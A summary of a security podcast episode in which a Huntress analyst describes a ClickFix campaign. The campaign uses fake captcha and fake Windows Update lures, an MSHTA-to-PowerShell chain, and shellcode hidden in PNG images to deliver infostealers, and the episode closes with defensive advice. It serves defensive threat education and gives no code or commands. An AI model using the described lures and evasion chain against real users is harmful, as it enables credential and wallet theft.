CyberWire Daily: Research Saturday
Episode: Picture perfect deception
Date: January 17, 2026
Host: Dave Bittner, N2K Networks
Guest: Ben Folland, Security Operations Analyst at Huntress
Research Focus: ClickFix campaign leveraging steganography to deliver info-stealing malware
Episode Overview
This episode delves into recent research by Huntress on a malware delivery campaign dubbed “ClickFix Gets Creative: Malware Buried in Images.” Security Operations Analyst Ben Folland explains how attackers employ basic social engineering and technical evasion—specifically steganography—to deliver infostealer malware through seemingly innocuous images. The episode highlights attack mechanics, evolving lure techniques, payload capacities, threat actor sophistication, and actionable defenses for organizations.
Key Discussion Points & Insights
1. Introduction to ClickFix Malware Campaign
[01:48-02:19]
- ClickFix is a simple malware delivery technique primarily exploiting human gullibility. Victims are typically tricked into copying and pasting a malicious command, triggering the compromise.
- A unique aspect of this campaign: steganography. Malicious payloads are concealed within benign-looking PNG images.
- Quote:
Ben Folland [02:19]:
"The malware leveraged technique called steganography and it hid the actual final core infostealing malware payload within a benign PNG image... This is something we don't often see and it's an interesting evasion technique."
2. How Steganography Defeats Conventional Detection
[03:43-04:42]
- Image files are generally perceived as harmless, making them ideal for hiding malicious code.
- Even thorough inspection of these images wouldn't readily reveal the embedded malware without insight into the extraction process.
- Antivirus software usually fails to flag these images, as payload extraction requires specific execution logic.
- Quote:
Ben Folland [03:54]:
"...Malware embedded with images can be written to disk and antivirus can scan them all they want, but they won't be able to identify the hidden payload inside the image because the method... is really hard for antiviruses to automatically detect."
3. ClickFix Lures: Robot Verification vs. Fake Windows Update
[04:42-08:48]
- Two major lures:
- Robot verification page ("fake captcha"): Looks like a standard web verification step. Often AI-generated or low-effort, but still effective, especially on compromised legitimate sites.
- Fake Windows Update screen: Highly sophisticated and convincing. Drives the browser to fullscreen, hides the cursor, and fakes a Windows update sequence. Provides fake instructions to open Windows Run, with malicious commands automatically copied to the clipboard via JavaScript.
- The update-themed lure is particularly effective, as users feel compelled to follow visible directions, especially under apparent system 'lockdown'.
- Quote:
Ben Folland [06:45]:
"...When you visit the website, it will try to trick you into thinking Windows has started an update sequence and your browser will go into full screen, your mouse cursor will go hidden..." - Once the command is run, infostealing malware becomes active, searching for browser credentials, crypto wallets, sensitive files, and exfiltrating data to attackers.
4. Multi-Stage Execution Chain
[09:53-12:46]
- The campaign consists of multiple, obfuscated stages:
- User pastes malicious command (from lure page).
- MSHTA (a legitimate Windows component) is used to avoid triggering antivirus, downloading and running further payloads in memory.
- PowerShell scripts are subsequently executed to decrypt and load more code.
- Eventually, a .NET binary with an embedded PNG image executes, extracting shellcode hidden within the image’s pixel data using XOR operations.
- Technical depth: Carefully staged to avoid disk artifacts, splitting the execution and extraction logic, further complicating detection and analysis.
- Quote:
Ben Folland [11:23]:
"...The threat actors had put a lot of effort into obfuscating and using steganography... make analysts like myself's lives harder by splitting it into so many different stages."
5. The Payloads: LumaC2 & Rhadamanthus Infostealers
[12:46-15:34]
- Both are powerful, well-known "malware as a service" infostealers available on dark web forums, often rented out to attackers.
- Capabilities include stealing browser credentials, Outlook or desktop app credentials, crypto wallet info, and intercepting clipboard content for sensitive data like crypto keys.
- Recent international law enforcement actions have targeted these malware’s infrastructures, but disruptions are rarely permanent.
- Quote:
Ben Folland [13:56]:
"LumaC2 can do an interesting capability. It can intercept clipboard information... and exfiltrate them back to the threat actor, which is an interesting way of stealing this data."
6. Attribution & Threat Actor Sophistication
[15:34-16:54]
- The perpetrating accounts advertise on Russian-language cybercrime forums; specific identities are unknown.
- Not believed to be APT or nation-state operations—these are opportunistic, low-to-moderate sophistication campaigns, but remain highly impactful due to infostealer prevalence.
- Quote:
Ben Folland [16:13]:
"As a whole, these aren't a super sophisticated threat, but they're a high impact threat. Info stealers as a whole are the most prolific malware we see in the wild."
7. Defensive Recommendations
[17:02-18:46]
- Security awareness training must now explicitly cover ClickFix and fake captcha/update lures—not just traditional phishing methods.
- Restrict use of the Windows Run box (via Group Policy or registry edits). Limit PowerShell access for non-IT users.
- Acknowledge training alone isn’t sufficient—technical mitigations must back up user education.
- Quote:
Ben Folland [17:23]:
"Security awareness training is really important. But... it doesn't always work. And this is why we need to implement stronger mitigation... blocking the Windows run box... And you can do the same with PowerShell..."
Notable Quotes & Moments
- Steganography’s Rare Use:
Ben Folland [02:19]:
“This is something we don't often see and it's an interesting evasion technique. A way of hiding the malicious code within a benign image.” - On Lure Effectiveness:
Ben Folland [07:49]:
"Their screen would go into full screen... unlikely to call up IT or ask for help when they've got some instructions right in front of them..." - Defensive Frustration:
Ben Folland [11:23]:
"It's clear they wanted to make analysts like myself's lives harder by splitting up into so many different stages."
Important Segment Timestamps
- Intro & Concept: [01:48-02:19]
- Steganography Explained: [03:43-04:42]
- Fake Captcha vs. Windows Update Lures: [04:42-08:48]
- Execution Chain Detail: [09:53-12:46]
- Payload Description: [12:46-15:34]
- Attribution & Impact: [15:34-16:54]
- Defensive Advice: [17:02-18:46]
Episode Takeaways
- Attackers continue to reliably exploit the weakest link—users—through ever-more convincing social engineering tactics.
- Advancements in technical evasion, such as steganography within PNG images, are challenging traditional detection tools.
- Defenders should broaden awareness efforts beyond email phishing to include new techniques like ClickFix and enhance endpoint controls accordingly.
For further details, the full Huntress research is available via the show notes.